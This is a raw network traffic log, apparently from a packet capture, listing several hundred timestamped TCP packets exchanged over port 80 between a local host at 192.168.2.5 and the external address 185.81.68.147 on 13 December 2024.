Dec 13, 2024 01:37:36.080252886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080264091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080281019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080302000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080322027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080333948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080360889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080377102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080382109 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080395937 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080396891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080416918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080432892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080454111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080461025 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080470085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080473900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080492020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080507994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080529928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080543995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080564976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080570936 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080579996 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080585957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080600977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080605984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080610037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080624104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080631018 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080646992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080660105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080696106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080710888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080734015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080748081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080770016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080786943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080807924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080818892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080826044 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080835104 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080866098 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080874920 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080878973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080890894 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080899954 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080907106 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080915928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080950975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080965996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.080996037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.080998898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081047058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081052065 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.081063032 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.081069946 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.081072092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081098080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081113100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081137896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081151009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081173897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081187963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081207991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081224918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081248045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081262112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081283092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081300020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081330061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081348896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081376076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081389904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081413984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081429005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081449032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081464052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081485033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081501007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081521034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081535101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081558943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081573963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081597090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081610918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081631899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081649065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081676960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081691980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081712961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081727982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081751108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081764936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081789017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081803083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081825972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081845999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081866026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081880093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081898928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081914902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081948042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081962109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081983089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.081998110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082020044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082036972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082084894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082110882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082123995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082153082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082184076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082207918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082222939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082278013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082295895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082320929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082335949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082357883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082371950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082387924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082413912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082427979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082448959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082463026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082487106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082503080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082528114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082541943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082564116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082577944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082602978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082617044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082638979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082653046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082675934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082691908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082711935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082726002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082751036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082765102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082789898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082803965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082819939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082900047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082928896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.082952976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083035946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083070040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083127022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083137035 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.083151102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083175898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083184004 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.083194971 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.083199978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083206892 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.083301067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083323956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083354950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083368063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083389997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083404064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083429098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083445072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083628893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083698988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083714962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083738089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083754063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083779097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083797932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083822966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083837032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083859921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083873034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083894014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083906889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083929062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083944082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083967924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.083982944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084002972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084016085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084034920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084048986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084076881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084090948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084111929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084126949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084147930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084171057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084183931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084203959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084223032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084249020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084261894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084291935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084307909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084317923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084394932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084408998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084433079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084446907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084479094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084492922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084518909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084533930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084554911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084578991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084593058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084613085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084628105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084650040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084677935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084884882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084898949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084922075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084935904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084956884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084970951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.084992886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085006952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085020065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085047007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085059881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085079908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085093975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085114956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085128069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085150957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085165977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085187912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085201979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085330963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085350990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085372925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085437059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085464954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085490942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085545063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085568905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085588932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085612059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085683107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085737944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085756063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085784912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085799932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.085838079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086059093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086085081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086100101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086128950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086154938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086179972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086224079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086224079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086241007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086268902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086292982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086307049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086333036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086347103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086381912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086513042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086530924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086622000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086648941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086674929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086760044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086776018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086815119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086853981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086879969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086899042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086925983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086941957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086971045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.086997032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087014914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087042093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087235928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087270021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087296009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087333918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087333918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087363958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087377071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087409019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087421894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087450027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087469101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087495089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087517977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087543964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087558031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087683916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087703943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087729931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087816000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087852001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087871075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087943077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.087982893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088023901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088052988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088054895 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088071108 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088077068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088080883 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088128090 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088128090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088145971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088191986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088222980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088222980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088259935 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088296890 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088304996 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088346958 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088356018 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088362932 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088382959 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088454962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088469982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088510036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088524103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088530064 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088540077 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088548899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088579893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088587999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088591099 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088598967 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088608027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088614941 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088632107 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088639021 CET	80	49775	185.81.68.147	192.168.2.5
